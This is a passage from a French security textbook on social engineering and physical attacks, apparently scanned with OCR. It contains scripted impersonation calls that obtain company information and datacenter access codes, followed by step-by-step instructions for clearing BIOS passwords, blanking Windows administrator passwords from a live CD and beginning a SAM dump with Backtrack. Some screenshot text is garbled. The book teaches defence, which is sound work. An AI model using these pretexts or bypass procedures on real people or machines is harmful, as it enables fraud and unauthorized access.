passer pour un surveillant dans une salle de permanence de son lycée. 


Quand le père de son amie le lui demande, Mickael est d'accord pour lui 
trouver des informations sur les plus gros prospects de la S.A. Airelles, 
société de fabrication et de distribution de vins et spiritueux. Mickael com- 
mence par se renseigner sur Internet, durant quelques minutes, et finit par 
trouver quelques noms : Nicolas DRINCO, un commercial. Il décide alors 
d'appeler la société. 


Standard .- « Société AIRELLES bonjour, ici Marie, que puis-je faire pour 
vous ? » 


Mickael .- « Bonjour Marie, ici Cédric Goudement, dites-moi j'ai rencontré 
votre comptable il y a peu, Nicolas DRINCO, et il y avait aussi un com- 
mercial avec nous... » 


Standard - « Pardonnez moi, Nicolas n'est pas notre comptable, en fait 
c'est lui le commercial, notre comptable se nomme Michel FRANC. » 


Mickael .- « Oh, merci de la correction, voilà qui va m'empêcher de faire 
une bêtise ! Pourrais-je entrer en relation avec Monsieur FRANC ? » 


Standard .- « Oui, bien sûr, ne quittez pas. » 


Mickael est alors transféré auprès du comptable à qui il va parler en cou- 
vrant sa voix. 


Comptable .- « Oui, allé ? » 


Mickael .- « Salut Michel, c'est Nicolas. Mon variable me semble ridicule ce 
mois-ci, est-ce que tu saurais me donner quelques informations qui pour- 
raient m'aider, comme des clients sur le départ ou d'autres qu'on n'a pas 
encore signés ? » 
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Michel FRANC indique alors plusieurs noms à Mickael, qui fit un grand 
plaisir au père de son amie en les lui transmettant. 


Voici un second exemple : 


Bleck79 est un pirate qui manque de reconnaissance. Pour réussir à être 
reconnu de ses pairs, il décide de réaliser un exploit : il veut réussir à se 
faire appeler sur son portable pour un souci d'ordinateur, et ce, depuis l'in- 
térieur des bureaux d'une grosse entreprise dont l'un des pôles est la sécu- 
rité informatique. 


Arpègelnfo .- « Arpègelnfo, bonjour. » 


Bleck .- « Bonjour Monsieur, ici Jean ROBERT de l'URSSAEF, puis-je entrer 
en relation avec votre service Ressources Humaines ? » 


Arpègelnfo - « Bien sûr, ne quittez pas, je vous mets en relation. » 


Ressources Humaines .- « Bonjour. » 


Bleck .- « Bonjour Madame, nous sommes dans les déclarations concernant 
votre entreprise, et nous aimerions savoir quel est le dernier employé arrivé 
chez vous, il s'avère que j'ai un doute sur l'arrivée de certaines déclarations, 
je pense qu'elles ont été perdues. » 


Ressources Humaines .- « Voilà qui est gênant. Notre dernier employée 
arrivée est Claire PASCALE, elle est là depuis quelques jours seulement, 
peut-être n'avez-vous tout simplement pas encore reçu la déclaration ? » 


Bleck .- « Eh bien non, c'est de ma faute, j'ai la déclaration sous les yeux, 
j'aurai dû lire la date avant de vous appeler, il y a peu de chances que vous 
ayez embauché d'autres personnes entre-temps ! » 


Ressources Humaines .- « Pas de problème, bonne journée à vous. » 
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Bleck raccroche et recompose le numéro du standard. 
Arpègelnfo .- « Arpègelnfo, bonjour. » 


Bleck .- « Bonjour Monsieur, j'aurai voulu joindre Claire PASCALE s'il vous 
plaît. » 


Arpègelnfo .- « Bien sûr, ne quittez pas, je vous mets en relation. » 
Claire Pascale .- « Oui, allé ? » 


Bleck .- « Bonjour Claire, ici Patrick, du service info. On t'a mis au courant 
des techniques de sécurité, avec l'installation de l'outil ? » 


Claire Pascale .- « Pas vraiment, non » 


Bleck .- « Ce n'est pas grave, on va l'installer maintenant » 


Bleck/9 réussit à faire installer par Claire, une employée nouvelle ne 
connaissant pas encore les procédures et les personnes, un petit logiciel 
qui dans quelques jours va afficher à l'écran un message d'erreur, et inviter 
l'utilisateur (Claire en l'occurrence) à demander Patrick en composant un 
numéro de téléphone. Bleck/9 a pris soin d'acheter un téléphone avec une 
carte SIM utilisable, au moins pendant quelques jours, sans avoir à divul- 
guer son identité. 


Et voici un dernier exemple : 


Dans certains centres d'hébergement, les salles blanches ont un accès pro- 
tégé par un identifiant inhabituel : un code parmi plusieurs situés sur une 
carte. Pour entrer dans la salle, il faut avoir annoncé son arrivée 15 minu- 
tes avant, par téléphone, et avoir donné le code demandé par l'opérateur. 
Frédéric, lui, ne possède pas ces informations, mais aimerait accéder à la 
salle blanche pour débrancher le serveur qui héberge un site Internet 
divulguant des informations confidentielles sur les produits de son entre- 
prise. C'est Joseph HILL qui gère ce serveur selon les informations du 
WHOIS. 


Joseph HILL .- « Oui, allô ? » 
Frédéric .- « Bonjour, Monsieur HILL ? » 


Joseph HILL .- « Lui-même » 
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Frédéric .- « Bonjour Monsieur HILL, je fais la vérification des procédures 
d'accès à la salle blanche pour la société DEF Hébergement, et chez laquelle 
vous avez des serveurs hébergés. J'aimerais simplement connaître la couleur 
de la carte avec les codes que vous avez, ainsi que le code B indiqué sur 
celle-ci. Il s'agit pour moi d'être sûr de parler à la bonne personne, et en 
même temps de vérifier si vous avez la bonne version de procédure, on 
vérifie cela par la couleur de la carte. » 


Joseph HILL - « Ah, très bien. Ma carte est blanche, le code B est 
ORCHIDEE » 


Frédéric .- « Carte blanche, c'est la bonne procédure qui est marquée dans 
votre dossier. Par contre, vous pouvez me donner de nouveau le code, je 
n'ai pas le même dans mes papiers. » 


Joseph HILL .- « J'ai pourtant clairement Orchidée de marqué pour le code 
B, et je l'ai utilisé plusieurs fois. » 


Frédéric .- « Ah, OK, simple méprise, je voulais le code D. Vous pouvez me 
le donner ? » 


Joseph HILL . « Oui, c'est Économie » 


Frédéric - « Parfait Monsieur HILL, j'en ai fini avec cette vérification 
d'usage. Peut-être voulez-vous en profiter pour exprimer un sentiment sur 
le service fourni par DEF Hébergement ? » 


Joseph HILL .- « Non, cela ira. » 


Frédéric - « Parfait Monsieur HILL, je vous souhaite une excellente 
journée .» 


Frédéric raccroche et appelle ensuite la société DEF Hébergement, pour 
demander un accès. 


DEF .- « Bonjour. » 
Frédéric - « Bonjour, c'est pour déclarer un accès » 


DEF ~- « Oui bien sûr, je vais prendre votre nom, et le code A ». 
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Frédéric .- « Je suis Joseph HILL, mais c'est mon employé qui viendra, Gary 
HACKMAN. Par contre, je n'ai pas ma carte avec moi, mais je connais les 
autres codes, c'est ceux que vous me demandez habituellement. Le B c'est 
Orchidée, le D c'est Economie. » 


DEF .- « Parfait, nous attendons Monsieur HACKMAN. » 


Grâce à une attaque dite d'inversion, très proche de la technique du Man 
In The Middle, Frédéric peut accéder aux serveurs informatiques stockés 
chez DEF et dont les propriétaires n'ont pas verrouillé les baies. 


Contre-mesures 


La matrice des sensibilités 


Maintenant que nous avons vu comment procèdent les attaquants pour 
détourner les systèmes de protection, il est temps de prévoir une améliora- 
tion de ces systèmes. Il convient de rappeler que comme toutes les mesures 
de protection, celles qui seront présentées ici représentent un coût financier 
ou temporel qu'il faudra appréhender avant toute mise en place : il ne faut 
pas que la sécurité du système d'information soit plus lourde que le 
système lui-même. 


L'une des contre-mesures consiste à dresser une matrice des sensibilités qui 
régit les accès aux informations. Il s'agit d'abord de classer les informations 
dans des catégories : informations financières, informations techniques, 
informations juridiques, informations publiques. Ensuite, il faut classer les 
personnes dans des groupes, pour enfin indiquer quel groupe a accès à 
quelles informations. 
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Enfin, cette matrice doit être disponible pour tous les collaborateurs de la 
société, pour qu'ils s'y réfèrent en cas de doute. Cette solution, qui peut 
paraître simple, est pourtant en vigueur et très fonctionnelle dans de nom- 
breuses entités : c'est ainsi que l'armée française classifie ses documents, 
allant du terme « Restreint » au terme « Très Secret Défense » en passant 
d'abord par le « Confidentiel défense » puis par le fameux « Secret Dé- 
fense ». Les groupes de personnes sont représentés par les habilitations 
qu'ont les personnels à consulter des documents classifiés ou non. 


Pour être fonctionnelle, une classification doit être stricte et cohérente : 
marquer des choses comme « tous les documents sont interdits au public » 
risque d'entraîner des écarts, d'abord petits, tolérés, puis de plus en plus 
gros. Il faut donc passer au crible tous les documents pour leur donner un 
niveau de classification et ensuite, vérifier les accès, très sérieusement. Par 
exemple, certains documents classifiés de l'armée ne sont imprimés qu'en 
un unique exemplaire, sans possibilité de faire une copie. Les fuites en sont 
rendues très difficiles. 


Enfin, il faut associer tous les collaborateurs à cette pratique. Nous l'avons 
vu dans les pages précédentes, chaque collaborateur qui ne connaît pas les 
procédures peut représenter un danger pour la sécurité des informations. 


Détecter les attaques 


Il est important que les employés se posent des questions, pour pouvoir re- 
connaître les attaques. Par exemple, se demander « pourquoi, qu'en faire » : 
pourquoi vouloir cette information, qu'est-ce qu'on peut faire de cette 
information hors de la justification avancée. En effet, c'est comme cela que 
l'on arrive à se dire qu'un mot de passe qui nous est demandé peut servir à 
bien plus de choses qu'à mettre à jour un compte, comme on veut bien le 
prétendre. 


Mais en se posant toutes ces questions, il est sûr que nous allons découvrir 
des faux positifs, des appels qui ressembleront à des attaques et qui n'en 
seront pas. Pour en être sûr, il existe un moyen intéressant : demander un 
nom et un numéro de téléphone où rappeller, et juger du sérieux de la 
réponse. 
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Si la personne prétend ne pas avoir de téléphone dans son bureau, ou 
qu'elle indique que c'est le chef cuisinier qui répondra parce qu'elle s'est 
arrêtée dans un restaurant pour travailler, il convient de se méfier quelque 
peu. Mais il ne faut pas négliger non plus la probabilité que l'attaquant ait 
acheté l'un de ces téléphones à carte SIM prépayée qu'on peut utiliser 
plusieurs jours sans le déclarer. 


Bonnes pratiques 


Dans de nombreuses entreprises, on utilise les bonnes pratiques, des fiches 
cartonnées (ou numériques) indiquant que faire dans quelle situation. Il 
existe maintenant quelques entreprises qui ont inclus, dans leurs fiches, les 
risques d'attaque par social engineering et qui proposent des solutions pour 
prévenir ou gérer une attaque. Par exemple, certaines bonnes pratiques veu- 
lent que l'on ne donne jamais, pour quelque raison que ce soit, son mot de 
passe à quiconque, et que celui-ci doit être assez long (même si, de nos 
jours, c'est l'outil informatique qui force l'utilisateur à respecter cette 
dernière règle). 


Le doute, également, ne doit pas profiter à l'attaquant. Il faut, en cas de 
doute, prendre les mesures nécessaires pour lever celui-ci. L'important, c'est 
alors d'oser demander. Il faut, pour le responsable de la sécurité du Système 
d'Information, être clair sur le fait qu'on ne sanctionne pas quelqu'un pour 
avoir hésité à donner des informations confidentielles. Même si nous refu- 
sons une information au patron par téléphone (hormis si notre patron a 
une voix clairement reconnaissable et que nous n'avions aucune raison 
tangible de douter de son identité). 


Naturellement, toutes ces protections ne se mettent pas en place du jour 
au lendemain, et surtout pas en n'expliquant pas aux collaborateurs pour- 
quoi elles existent. Il faut réellement expliquer les dangers, utiliser des 
exemples comme ceux cités dans ce livre, que nous avons voulu simplistes 
mais pragmatiques, voire même des exemples adaptés à l'entreprise, que 
nous pouvons extraire lors d'un audit de tests. 
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Le mot de la fin concernera les particuliers. Si tout au long du chapitre, 
nous avons pu voir des cas liés aux entreprises, il faut savoir que le social 
engineering s'attaque aussi aux particuliers. C'est pourquoi nous recevons 
tous régulièrement des e-mails prétendant provenir de notre banque, mais 
c'est aussi pourquoi certains d'entre nous ont reçu des SMS ou des appels 
téléphoniques leur proposant de valider leur victoire à un tirage au sort en 
donnant leurs informations de carte bancaire pour que le paiement puisse 
être effectué (alors qu'un simple RIB aurait suffit). 


Les protections contre le social engineering sont simples : être attentif, 
réfléchir quelque peu à la confidentialité des données divulguées, et ne 
jamais faire confiance à un interlocuteur ou à son histoire, sauf s'il s'agit 
d'une personne formellement identifiée. 


MRemarque 


Nous parlions dans la section Anatomie d'une attaque - Les moyens utilisés, 
d'une cible qui reçoit un appel avec un numéro masqué. Le seul moyen pour 
elle de le trouver est de porter plainte pour demander à la justice de retrouver 
le numéro, ce qui techniquement est très simple à obtenir puisque les opéra- 
teurs sont contraints de journaliser tous les numéros appelants et appelés pour 
chaque ligne. Mais il faut pour cela avoir de réelles raisons de faire appel à la 
justice, et donc avoir des preuves tangibles d'un détournement. C'est pourquoi, 
il vaut mieux se prémunir, car il n'y a parfois aucun recours. 
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1. Généralités 


Il faut bien le dire, force est de constater que souvent la sécurisation des 
accès aux matériels informatiques en entreprise ou dans certaines adminis- 
trations n'est pas une priorité. Il suffit pour s'en convaincre de faire le test 
et de voir avec quelle facilité, sous un prétexte quelconque, une personne 
étrangère au service peut souvent accèder aux ordinateurs ou autres 
ressources informatiques du personnel. 


En effet autant les accès serveurs, routeurs et autres matériels d'administra- 
tion informatique sont, dans les moyennes ou grandes entreprises, sous clé 
dans une salle spécialisée, autant les ordinateurs d'exploitation ou adminis- 
tratifs sont relativement accessibles. 


Quand la question sur l'accès au matériel est posée au personnel, celui-ci 
relativise généralement le problème et répond qu'il n'a, par exemple, pas 
accès à des informations confidentielles, que l'entreprise fonctionne comme 
cela depuis des années et qu'elle n'a jamais connu le moindre problème. 
Quelquefois même la question est éludée sous prétexte que jamais aucune 
information ou même formation n'a été dispensée. 
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Si nous nous tournons vers les petites sociétés, le problème s'aggrave 
encore. Les ordinateurs sont souvent très accessibles et un même compte 
utilisateur est souvent utilisé par tous avec un seul mot de passe (quand il 
y en a un |). 


Or l'accès physique à un ordinateur peut avoir des conséquences désastreu- 
ses pour une entreprise et nous allons voir dans les démonstrations suivan- 
tes qu'il existe bien des manières de s'approprier des informations confiden- 
tielles dès que nous avons un accès (même restreint) à une machine. 


Accès physique direct à l'ordinateur 


Deux cas de figure sont possibles lors d'un accès physique à une machine : 
- L'ordinateur est éteint ; 
- L'ordinateur est allumé. 


Remarque 


Dans les pages qui suivent, les indications [1] à [20] renvoient à la fin du 
chapitre à l'index des sites web. 


Accès à un ordinateur éteint dont le bios est protégé 


Nous devrions toujours nous retrouver dans ce cas de figure car il demande 
des actions physiques sur l'ordinateur pour pouvoir réinitialiser le bios. Cela 
exige d'avoir du temps devant soi, d'être seul et attire toujours l'attention 
d'un éventuel personnel circulant dans les environs. 


En effet, pour pouvoir démarrer il va falloir remettre le mot de passe du 
bios à zéro. Pour cela, il faut nécessairement ouvrir l'ordinateur pour accé- 
der à la carte mère. Toutes les manipulations qui suivent doivent impérati- 
vement être effectuées sur l'ordinateur éteint. Il faut rechercher alors le 
composant appelé CMOS. Il contient dans sa mémoire la date, l'heure et 
divers paramètres, dont le mot de passe. Pour l'enlever, il va falloir vider le 
contenu de cette mémoire. 
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Il existe deux possibilités selon la carte mère : 

- Si celle-ci dispose d'un connecteur CMOS doté d'un cavalier, il faut 
déplacer ce cavalier quelques instants sur les autres broches de ce même 
connecteur (repéré souvent CMOS CLAIR - CLR - CLRPWD - PASSWD - 
MOT DE PASSE - PWD), puis le replacer dans sa position initiale. Cette 
manipulation a pour effet de créer un léger court-circuit qui vide le 
CMOS. 

Si la carte mère ne possède pas de cavalier de ce type, il faut ôter pen- 
dant quelques minutes voire plusieurs heures la pile plate de la carte 
mère. 


Pile ou cavalier ? 


Dans certains cas l'ordinateur est équipé d'une mémoire eeprom et le mot 
de passe est sauvegardé dans celle-ci, le fait de débrancher la pile n'effacera 
donc pas le mot de passe. 


Nous avons souvent entendu ou lu qu'il existait des mots de passe univer- 
sels pour chaque bios. En fait c'est une ancienne réalité, ceci concernait le 
bios award, mais depuis la version 4.51, il n'y a plus de mot de passe 
générique. 
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Nous trouvions même à l'époque des listes de mots de passe pour les diffé- 
rents types de bios sur Internet. Ces méthodes ne restant pas secrètes très 
longtemps, certains constructeurs (Toshiba) ont même imaginé une autre 
méthode. Lors du démarrage de l'ordinateur, le BIOS envoyait un signal sur 
la sortie du port parallèle et vérifiait s'il le recupérait sur l'entrée. Si c'était 
le cas, aucune vérification du mot de passe n'était effectuée. Il fallait juste 
relier ensemble la sortie et l'entrée afin de boucler le signal de la sortie vers 
l'entrée. 


Une autre technique était de tenir enfoncée la touche [insert] au démarrage 
de la machine. 


En fait, les constructeurs d'ordinateurs préfèrent trouver des solutions obli- 
geant l'utilisateur à passer par leurs services aussi bien pour s'assurer que 
vous êtes le propriétaire de la machine que pour vous facturer la prestation. 


TA) C:WIHDOWS\eystemi2kmd.exe - cmosnwd.exe id BORA f 


Dump cmos 


06: 54 80 10 40 23 06 Q6 12 06 09 26 02 48 80 G8 GO [Y  # & @ | 

19: 46 FO 00 88 07 8B 02 17 dá 14 üO 00 80 BA 06 QQ Je 
29: 00 80 60 69 60 66 06 80 GA 08 60 NHU 08 QU QI FC | | | 
36: 00 04 20 89 00 BO 66 O6 06 60 06 GG HG GO GG GD 

60: 57 06 10 60 23 GU 86 12 66 09 26 U? 48 80 08 98 JE H &@ | | 
ba: 40 F6 YO BG 52 80 02 17 Då 14 09 00 00 00 OY OÙ fE 

60: 08 00 60 00 60 BO 06 06 60 06 06 GA HA GG G1 FC | 

70: BO Bå 26 80 00 GA GV GƏ GO OO 00 69 BO HA BO QG | 

660: 52 00 10 80 23 06 06 12 06 09 26 02 40 80 08 00 [İY  # Re ! 

50: 40 F6 00 08 97 80 0? 17 04 14 GÖ 00 00 66 08 66 e 

80: 06 06 60 08 90 08 BA AR HA HA OÙ 0 00 NA ALFE | 
B: 40 04 20 80 00 BÖ 00 QO 50 50 06 00 86 00 GG GG f | 
100: 07 00 16 80 29 08 66 12 06 49 26 02 40 88 098 DO IH H & @ | 
00: 46 FO BO BO 02 88 02 17 O4 14 00 68 00 00 0G 00O E | 
EO: O0 50 00 8O 8O RO 08 06 06 06 06 HO 06 GA BI FC I | 
F5: DO 04 26 80 60 GA GA 60 GO 00 HO GO 99 65 OA 08 a | 
(188: 57 06 19 06 23 00 06 12 86 09 25 02 40 80 8g VB H & B 


1110: 40 FO 06 BO 62 89 82 17 G4 14 00 0A 0A 0G OU Ə 
120: 00 OR 00 48 60 HO 00 QB RG 00 0G 60 8A 88 81 IE 
1180: D0 B4 26 86 06 09 60 HGA GƏ GB 05 G9 00 00 00 VO 
140: 52 90 10 99 23 00 H6 12 06 09 26 02 40 80 08 GU 
100: 40 F0 68 00 02 gA 02 17 Q4 14 BO OG 60 58 GO 00 
1160: 06 06 06 GG 66 90 GG 06 80 A GO GB 80 0) 01 FE 
140: 6) G4 28 80 6B 60 BO NA BO BA 06 06 06 8G 96 GY 


Press a key to continue 


Le logiciel cmospasswd 
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Il existe bien un moyen de décrypter les mots de passe bios. Un utilitaire 
est disponible, CmosPwd, mais il faut pour l'utiliser disposer d'un accès à 
l'ordinateur allumé. En fait mettre un mot de passe sur le bios pour l'amor- 
çage est un bon moyen de protection mais combien de nous le font vrai- 
ment ? 


Accès à un ordinateur éteint dont le bios n'est pas protégé 


Pour tout un chacun, un ordinateur éteint ne semble pas poser de problè- 
mes de sécurité dès l'instant où pour ouvrir une session sur le système il 
faut disposer d'un identifiant et d'un mot de passe. C'est sans compter sur 
les possibilités qu'offrent les systèmes tels que les livecd et les clés USB 
bootables pour ne citer qu'eux. Ces technologies relativement récentes et 
fortement à la mode, s'adaptent à tout type de système d'exploitation et 
sont souvent utilisées pour les opérations de maintenance technique. De 
fait, elles permettent par exemple de résoudre des problèmes d'oubli ou de 
perte de mot de passe. Dans les mains de personnes mal intentionnées, 
nous voyons tout de suite l'usage qu'il peut en être fait. 


Utilisation de Offline NT Password & Registry Editor v080802 


Ce logiciel très petit (il ne pèse que 4 Mo) disponible sur livecd et mainte- 
nant sur clé USB permet de réinitialiser le mot de passe des utilisateurs 
locaux sous différents systèmes Windows, de la version Windows NT à 
Seven en passant par 2000, XP, 2003, 2008 et Vista. Nous pouvons ainsi 
mettre à blanc le mot de passe de l'administrateur et même ajouter un uti- 
lisateur dans le groupe des administrateurs locaux, lui donnant ainsi des 
droits d'administration. 


Pour l'utiliser rien de bien compliqué, les habitués du système Linux ne se- 
ront pas dépaysés, pour les autres, c'est le prix à payer pour récupérer rapi- 
dement un accès à la machine. Nous devons donc booter sur le livecd ou la 
clé USB bootable. Sur la majeure partie des ordinateurs actuels, un petit 
coup de F12 au démarrage nous permet de choisir notre média de boot, 
nous choisissons en l'occurence le CD. Le système se lance et nous nous 
retrouvons sous une interface austère (légèreté oblige) qui nous invite au 
boot. Tapons juste [Entrée]. 
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RE EE MM DE DE MON DE HOME RE PEN DE HEIE -PE DE MN ME DEDEDE DE JE-DE DE HE DEEE DE PEIDE DÉDE PE DE P-DE DE DE HEDE BE HDE DE MPEP BE PEJE DE DE PEE ONE PEDE DE DE HEE DE EDEN NE DD 


La # 
w binduous HE/2Kk/XP/Uista Change Password / Registry Editor Boot CD * 
w x 
t (e) 195-2008 Petter Nordahi-Hagen., Bistributed under GĦU GPL vZ * 
B » 
s RISCLSIMER:;: THIS SOEPTURRE COMES WITH ABSOLUTELY NG YARRANTIES? # 
t THE AUTHOR CAN NET BE HELP RESPONSIBLE FOR ANY URMNGE x 
# CAUSED BY TRE CMISOUSE GF THIS SUIFTUARE x 
w x 
» flore info at: http:,/hone eunet .no/"puordahlsntpassud/ »* 
æ Email : gnordahleeunet no # 
w LS 
x CB build date: Sat Aug Z 00:59:30 CEST 2008 3 


FEIER IE HR DE IEH ME HER BE IER IE HO DE HIEI RE MODE DE HE HER RE HE IE OR DE EIEE JE HER DE HEMI ESC SEEVE HE EIE DE MON DE IE HEIE E AR JE HOUR 


Press enter to bagt, or give kinux kerael boot options first if needed. 
Same that À kave to use once in a while: 


bost nousk to turn ff USB if not used and it causes problems 
boot irgpoll -~ if same drivers hang with irg problem messages 
Got vqazask - if you have problems with the videumaode 

boot nadrivers - skip automatic disk driver loading 

bout: 


Boot sur le livecd 


Le premier écran nous demande sur quelle partition nous désirons travail- 
ler, généralement le choix (1) qui est proposé par défaut est le bon et nous 
nous contentons de taper [Entrée]. Si un double boot Windows existe, il 
faudra alors choisir la partition supportant le système auquel on veut 
accéder. 


© Editions ENI - Toute reproduction interdite 


Les failles physiques 
Chapitre 4 


zx] 
EE Ti petten Nt hag en 'RRordakiBeknet. no 
Jicense, see FETES or 


willi enable uon to change ox biank the Pas 
2. administrator) an an Hindaws NE/2R/X #5 
na the old gassenvd, 

iooked/&is RSI et accauntse Riso supported. 


also has R registry editer, and there is nou nupport 
adäing and deletisg kews and balues. 


Tested oni am Si A&A UTA: Howvketation Server FD 
k prar 2 Fa A SBSAge AD. 
ta 3 
pag EWOEE D 
prer 4 bit 


raro 
RA EK 


RAKERRREKZRKIKEREKE X 


pa 


where 

what parts 
y the p sword 
were MRS, weite 


PANIC Ugualliy the defaRru 
aii the way throug 


zonna 


+ 


are OK, Jus press enter 
the quest s 


eu 


Step QUE: _Éfulect disk where the Hindoes ‘installation 
bishks! ner s ; 

Dink /devr/sdal 10,7 CR, LOFBTALRZAÐO bytes 

Can Da M Hindaows rantitians found: p 
E fRes/sd4ns SOZZBMR (LRH), HOGE 


e PUreex Partition by NDumbee ar 

Qax € A 

aatømrtioRily start disk drivers 
manually sele disk drivers to lorna 
fetoh agdition 


& 
r 

sho CRES 

ee eseki 

EO € à D 


$i 
tions EBR 
hindas Éfres) partitions anis 


Srivers from Flogpu / usk 


Choix de la partition système 


Ensuite nous devons lui donner le chemin par défaut du répertoire dans 
lequel se trouve le registre, là aussi il nous affiche généralement le bon 
(windows/system32/config) et nous n'avons qu'à taper [Entrée]. 
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a Hin ZUUX Server Lounnat © Range VUE ET La 
pe Vista 24 and 64 bit, Sery EYE a +64 hit > 
x AINT; If things soroll bu too Last, za SHIFT- POUPZEGPONN : «2 # 
HEIE D HE IE PE DE JE DE HE DER AÈ HE E IE DE DE DRE E DE IE PE HE IÈ DE HE PE DÈ FE HE EDE HEIE IÈ E FE JE JE IE E E DE D PE PE I E SE DE AR FE DE IE AE HEN À DEEE IE HE DÈ AÈ HE 


to go t Brot 


Éhepe Y 41 ste 4 
Disk t ith optional londing ef isk deivers 
- PATH t, where e the Hindous systens files stored 
Filie-selwgt, haf y ts oF regis toys we need 
Then finallig the password change or registry egit itself 
~- IK Changes 2 


re made, write thèm Biek 6 Aik 
a 


# 
DON'T PANIC? y iiu the defauits ave OK, just press enter 
RII the wau through the anestions 


Bi ses à 
Disk Jdeu/sdn: 18.7 GB, 107357418248 bytes 


Candidate Hindows partitions Coana? 
a. à fasvfsiai LC22SMÉ (LBRI MOST 


selest partition by number or 
etant Risk deivers 
(ARE Arivar to loza 
aa k drigexs gro floppa / wub 
tie Rä Lonf 
Hindses Ares ? partitions aniy 
Selecgtod i 
ountin from /devfsdialt, with assumead filesystem type FRIZUFGT/TATI23 and similar 
Hwsine te mount FRAT 7 VENT 7 FEFAT3Z ete 


Sauces 


siRtive to windows &isk3 


Chemin du registre 


L'écran suivant affiche un menu, nous laisserons là aussi le choix par 
défaut qui nous propose d'effacer un mot de passe (1). 
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k fdevssans 18,7 GB, 180737418248 bytes 


A Hindows ER SP eura 
Jaev/sdsf B258h8 (ERA, BOOT 


ition bu pumber or 
Te aak LE save Z: 


; E; 
al rS KELE tria 2 ush 
riens Foure 

Hindous TREPO partitisns only 


Beleocted i 
founting fren /deu/säzi, With assumed Filesystem type FATZUFNIZFAI3ZZ and similar 
frying to mownt FNAT 7 VUKAT Z FRTRZ eəètc 


PUCSESS 


g Siep FRO: 


that is the paia ATELE steu directory? (relative to windows disk) 


2122 
2144 
144 
144 
aus 
21440 
BiSZ 
2144 
se 
j 
3 


& 


istry ta D & 
as del 


Choix de l'action à exécuter 


Un menu intermédiaire nous propose alors d'éditer la base des utilisateurs, 
nous le validons et via un dernier écran nous avons maintenant le choix de 
mettre à blanc le mot de passe, de redéfinir le mot de passe de l'utilisateur 
(à manier avec prudence sous XP et Vista), de promouvoir un compte nor- 
mal en administrateur et de déverrouiller un compte bloqué. Nous choisis- 
sons d'effacer le mot de passe administrateur (1) et nous tapons [Entrée]. 
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RARE Fa 407 ELF “2 73 
EGFFTHARE 


hive nat Lnaded, and Ebene’ as shege RecnavermgEén#e de Se ft ie dax s a 


=) chatpn Main fntrractive Mena 22% 


Loaded hives? sam) Csustenÿ Lsecsxrmi La 


$4 =. Edit user gata anA HMASSWOMÈS 

8 7 SYF ab SENE & change 

2 RecoveruConseis settinys 

E, a Regi steny editore agw sith fuli seite support? 

ki Ruit uoa wili be asked if theve is sonethiné to saug? 
Hihat to da? RÉ >79 A 
Sinple peeyisteg editor., ? for heip., 
> a 
<>= Hrmns<C> chntpu Main fnfenaetive Menu Ldzzessamme<)y 
Leaded hivesi san) (aus (em) <seourita 

2 Edif u data apd passgaords 

a Š uske atun À changa 


véerngoonso ke PCLiASS 


3 editor new with AS Fu ite sepan tI 
4q — Bnl t ee Mit be asked If th is something to saue? 


Hhat to do? CLI => À 


22722 chotpe Edit Hser infe & Passwords 


Re EES NET NE 
stratene 


sistant 


r fist sers, @x<RIDÐD>? — User i REB <he)s 
> the usernaus to change: fa ateuri 


Reset du mot de passe administrateur 


Nous devons ensuite quitter les menus en tapant successivement « ! » puis 
«q» et enfin « y » pour valider l'écriture dans le registre. 


Nous revenons alors à l'écran de départ où nous n'avons qu'à valider le 
choix par défaut (n) qui est de quitter l'application. 


Nous redémarrons alors la machine qui au reboot affichera certainement 
un écran nous proposant de vérifier l'intégrité de l'un des disques (nous 
venons de le modifier), ignorez cette vérification. 
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H Windows’? 


verification du système de Fichiers 
Le type du système de fich 


L'intégrité de i'un de vos disques doit être vérifiée, 

vous pouvez annuler cette vérification, Mais son exécution est 
fortement recommandée. 

Pour ignorer ta vérification, appuyez sut une touche avant 6 secondes. 


Vérification de l'intégrité des disques 


Voilà, nous n'avons plus qu'à nous identifier comme administrateur sans 
mot de passe ! 


Comme nous avons également pu le voir, nous pouvons réactiver et passer 
dans le groupe Administrateurs un compte anodin (invité par exemple). 
Cela permet à une personne mal intentionnée de rester discrète et d'avoir 
un compte ayant des droits d'administration. 


Dumper la base SAM avec Backtrack 


Comme nous venons de le voir, il est possible d'effacer le mot de passe de 
l'administrateur pour se connecter à sa place mais ce n'est pas une méthode 
discrète et réutilisable. 


Pour un pirate, il est plus intéressant de récupérer le mot de passe de l'ad- 
ministrateur ou d'un utilisateur pour pouvoir se connecter plusieurs fois et 
paramètrer la machine pour un accès à distance plus discret (backdoor). 
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Sous Windows XP, il existe une méthode qui permet de récupérer (dumper) 
rapidement la base SAM qui est l'endroit où sont stockés et cryptés les 
comptes et mots de passe utilisateurs. Nous utiliserons pour ce faire, un 
livecd Linux qui a acquis ses lettres de noblesse dans le monde de la sécuri- 
té informatique et qui s'appelle Backtrack. Ce livecd réunit de nombreux 
outils logiciels servant à auditer les systèmes informatiques et contient 
notamment tout le nécessaire pour le dump de cette base des utilisateurs 
Windows. À l'heure où nous écrivons cet ouvrage, la version stable de cette 
distribution est la 3 et une version 4 bêta est sortie récemment. 


Le dump de la base SAM est très rapide et permet ensuite de travailler chez 
soi au décryptage des mots de passe, plusieurs méthodes sont possibles 
comme nous le verrons ensuite. 


Pour l'instant, attaquons-nous au dump de cette base. Nous récupérons ce 
livecd sur le site de Backtrack [2] et après gravage nous bootons la machine 
cible sur celui-ci. Un menu de boot s'offre alors à nous, choisissons le mode 
kde ou vesa kde si nous ne sommes pas certains des ressources matérielles. 
Nous sommes maintenant en mode graphique sous une interface assez 
réussie. 


Passons tout de suite en clavier azerty en cliquant avec le bouton gauche 
de la souris sur le petit drapeau à droite de l'écran et en choisissant France. 
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Terminal Choix de la langue 


Accueil Backtrack-Choix de la langue 


Ce qui va suivre est très compréhensible pour un linuxien. Que ceux qui ne 
connaissent pas ce système d'exploitation se rassurent, ce n'est malgré tout 
pas très compliqué. Dans le principe, en utilisant un livecd, l'accès aux don- 
nées figurant sur le disque dur de la machine cible n'est pas implicite. En 
effet un livecd utilise un "ram disk" qui est en fait une partie de la mémoire 
vive qui est utilisée comme mémoire de masse. Pour avoir accès aux don- 
nées figurant sur le disque de la machine cible et en particulier à la base 
SAM, il faut accrocher la partition contenant celle-ci au système de fichiers 
de notre livecd, on appelle cela "monter" une partition. 
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La backtrack est une distribution bien conçue et le montage des partitions 
se trouvant sur le disque dur est exécuté automatiquement. La partition 
Windows nommée hdal sous Linux a été montée dans le répertoire 
/mnt/hda1. Malgré tout, pour certaines versions de Windows, il arrive que 
le répertoire Windows soit écrit en majuscules, alors qu'il est en fait en 
minuscules. 


Pour remédier à cela, il suffira de démonter la partition et de la remonter 
ensuite : 


umount /mnt/hdal 
